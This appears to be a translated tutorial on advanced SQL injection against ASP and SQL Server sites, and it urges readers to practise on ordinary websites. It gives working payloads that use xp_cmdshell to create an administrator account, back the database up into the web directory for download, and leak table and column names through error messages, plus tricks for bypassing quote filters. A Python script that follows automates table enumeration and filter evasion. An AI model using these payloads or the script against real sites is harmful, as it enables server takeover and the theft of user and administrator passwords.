SQL Injection details-5

Source: Internet
Author: User
Advanced

Readers who have worked through the introductory and intermediate articles can practise on common websites. But what if you cannot guess the table name, or the program's author has filtered out certain special characters? How do you raise the success rate of an injection, and how do you make the guessing more efficient? This advanced article takes up those questions.
Section 1. Injecting SQL Server databases using system tables

SQL Server is a powerful database system that is tightly integrated with the operating system. That is very convenient for developers, but it also gives an injecting attacker a stepping stone. Let's look at several concrete examples:
① http://site/url.asp?id=1;exec master..xp_cmdshell "net user name password /add"--
In SQL Server the semicolon separates the first statement from the second, and -- marks everything after it as a comment, so SQL Server splits this into two statements: first the SELECT that fetches the record with id=1, then the stored procedure xp_cmdshell, which runs an operating-system command. The net command creates a Windows account with user name "name" and password "password". Then:

② http://site/url.asp?id=1;exec master..xp_cmdshell "net localgroup administrators name /add"--
adds the new account to the Administrators group; in under two minutes you hold the highest privilege on the system. Of course, this only works when the application connects to the database as sa (or another member of the sysadmin role); otherwise you have no permission to call xp_cmdshell. On SQL Server 2005 and later the procedure is also disabled by default and must first be switched on through sp_configure, which likewise requires sysadmin.

③ http://site/url.asp?id=1 and db_name()>0
This is like the earlier "and user>0" example, which obtained the name of the connecting user; db_name() is another system function, and it returns the name of the database the application is connected to. Comparing that string with the integer 0 forces a type-conversion error whose message contains the name.

④ http://site/url.asp?id=1;backup database dbname to disk='c:\inetpub\wwwroot\1.db';--
This is a pretty ruthless trick: take the database name obtained from ③ (dbname above), add the absolute path that some IIS error messages expose, back the database up into the web directory and download the entire database over HTTP. Every administrator and user password is laid out at a glance. When you do not know the absolute path you can instead back up to a network address (a UNC share), but the success rate is low. Note that the file is written by the SQL Server service account, which must have write permission on the target directory.

⑤ http://site/url.asp?id=1 and (select top 1 name from sysobjects where xtype='U' and status>0)>0
As mentioned earlier, sysobjects is the SQL Server system table that stores every table name, view, constraint and other object. xtype='U' and status>0 selects the tables created by users. The statement above pulls out the first table name and compares it with 0, so the error message exposes the table name. How do you obtain the second and third table names? Let's leave that to our clever readers.

⑥ http://site/url.asp?id=1 and (select top 1 col_name(object_id('tablename'),1) from sysobjects)>0
With a table name from ⑤, object_id('tablename') returns the internal ID that corresponds to the table, and col_name(ID,1) gives the table's first column name. Replace 1 with 2, 3, 4... to pull out the column names of the guessed table one by one.
The six points above are the fruit of more than half a year spent studying SQL Server. As you can see, how well you understand SQL Server directly determines both the success rate and the speed of guessing. After studying SQL Server injection my development skills also improved a great deal; perhaps security and development really do complement each other.

Section 2. Bypassing program restrictions to continue injecting

As mentioned in the introductory article, many people like to test for injection vulnerabilities with the ' character, so many developers also "prevent" injection by filtering out the ' character. That may block some beginners, but anyone familiar with SQL injection can still use the relevant functions to get around the program's restrictions.

All of the statements I used in the "general steps of SQL injection" section were written so that they contain no single quotes; some of the statements in "injecting SQL Server databases using system tables" do contain them. Here is an example of how to rework such a statement. A simple where xtype='U' can be replaced by where xtype=char(85), because the ASCII code of the character U is 85. If the characters are Chinese, for example where name='用户', you can use where name=nchar(29992)+nchar(25143) instead.
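The script below is an added example and is not code from the original article. It ties Section 1 and Section 2 together: it builds the sysobjects and col_name() payloads of items ⑤ and ⑥ (including the "n-th table" generalisation the article leaves to the reader), pulls the leaked name out of the conversion error message the technique depends on, and then rewrites every single-quoted literal in a payload with char()/nchar() so that it survives a filter on the ' character. The URL http://site/url.asp?id=1, the table names and the server responses are constructed placeholders; the only real-world assumption is a SQL Server backend behind an ASP page that echoes the database error text.

```python
import re

# Added example, not code from the original article. Assumptions: SQL Server
# behind an ASP page that echoes the database error; http://site/url.asp?id=1,
# the table names and the sample responses below are placeholders.

BASE = "http://site/url.asp?id=1"
USER_TABLES = "from sysobjects where xtype='U' and status>0"  # the article's user-table filter


def table_payload(n):
    """Payload that leaks the name of the n-th (1-based) user table.

    n=1 is item 5 of the article verbatim; for n>1 the first n-1 names are
    excluded with a 'not in (select top n-1 ...)' subquery, which is the answer
    to the article's question about the second and third table.
    """
    if n < 1:
        raise ValueError("n must be >= 1")
    inner = f"select top 1 name {USER_TABLES}"
    if n > 1:
        inner += f" and name not in (select top {n - 1} name {USER_TABLES})"
    return f"{BASE} and ({inner})>0"


def column_payload(table, n):
    """Payload that leaks the n-th column name of `table` (item 6 of the article)."""
    return f"{BASE} and (select top 1 col_name(object_id('{table}'),{n}) from sysobjects)>0"


# Both SQL Server wordings put the value it failed to convert inside single quotes:
#   2000:  Syntax error converting the nvarchar value 'admin' to a column of data type int.
#   2005+: Conversion failed when converting the nvarchar value 'admin' to data type int.
LEAK_RE = re.compile(r"converting the n?varchar value '([^']*)' to")


def extract_leak(body):
    """Return the name SQL Server leaked in its int-conversion error, or None."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def enumerate_tables(fetch, limit=50):
    """Send table_payload(1..limit) through fetch(url) until a page shows no error."""
    names = []
    for n in range(1, limit + 1):
        leaked = extract_leak(fetch(table_payload(n)))
        if leaked is None:  # 'select top 1' returned NULL: no more user tables
            break
        names.append(leaked)
    return names


# --- Section 2: rewrite every '...' literal so the payload contains no quote ---
LITERAL_RE = re.compile(r"'((?:[^']|'')*)'")


def encode_literal(text):
    """char()/nchar() concatenation equal to `text`: 'U' -> char(85),
    '用户' -> nchar(29992)+nchar(25143). ASCII uses char(), everything else
    nchar() on UTF-16 code units, so non-BMP characters become surrogate pairs,
    which is how nvarchar stores them anyway."""
    if text == "":
        return "space(0)"  # char()/nchar() cannot produce an empty string
    units = text.encode("utf-16-le")
    parts = []
    for i in range(0, len(units), 2):
        unit = units[i] | (units[i + 1] << 8)
        parts.append(f"char({unit})" if unit < 128 else f"nchar({unit})")
    return "+".join(parts)


def strip_quotes(sql):
    """Replace each single-quoted literal in sql ('' inside a literal is one quote)."""
    return LITERAL_RE.sub(lambda m: encode_literal(m.group(1).replace("''", "'")), sql)


# Constructed responses standing in for the ASP page (not real captures).
SAMPLE_RESPONSES = {
    table_payload(1): "Microsoft OLE DB Provider for ODBC Drivers error '80040e07'\n"
                      "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting "
                      "the nvarchar value 'admin' to a column of data type int.",
    table_payload(2): "Conversion failed when converting the nvarchar value 'news' to data type int.",
}


def sample_fetch(url):
    return SAMPLE_RESPONSES.get(url, "<html>normal page, no error</html>")


if __name__ == "__main__":
    print(enumerate_tables(sample_fetch))           # ['admin', 'news']
    print(column_payload("admin", 1))
    print(strip_quotes(column_payload("admin", 1)))  # object_id(char(97)+char(100)+...)
    print(strip_quotes("where xtype='U'"))           # where xtype=char(85)
    print(strip_quotes("where name='用户'"))          # where name=nchar(29992)+nchar(25143)
```

Two practical notes. The payloads are shown unencoded, as the article writes them; before sending them you would URL-encode the query string (urllib.parse.quote handles the spaces, quotes and > signs). The literal regex only understands standard '...' string literals, so a fragment that carries quotes inside comments or double-quoted identifiers would need more than this, and a filter that also blocks parentheses or the + sign defeats the char() rewrite and calls for a different bypass.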
